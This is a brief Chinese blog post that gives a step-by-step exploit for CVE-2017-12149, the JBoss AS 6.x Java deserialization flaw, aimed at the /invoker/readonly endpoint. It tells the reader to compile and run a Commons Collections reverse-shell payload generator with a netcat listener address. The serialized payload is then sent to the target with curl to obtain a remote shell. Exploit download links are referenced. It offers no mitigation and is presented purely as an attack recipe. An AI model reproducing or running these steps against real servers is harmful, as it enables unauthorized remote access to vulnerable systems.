Menu

CVE-2017-12149 JBOOSAS6.X 反序列化

2017-11-20 - Java

漏洞地址:http://xxxxx:81/invoker/readonly
回显500

步骤1:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

步骤2:

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java ip:port (nc监听IP及端口)

步骤3

curl http://xxxxx:81/invoker/readonly –data-binary @ReverseShellCommonsCollectionsHashMap.ser

反弹即可

exp下载地址:
传送门

内容转载来源:
传送门2

Tags: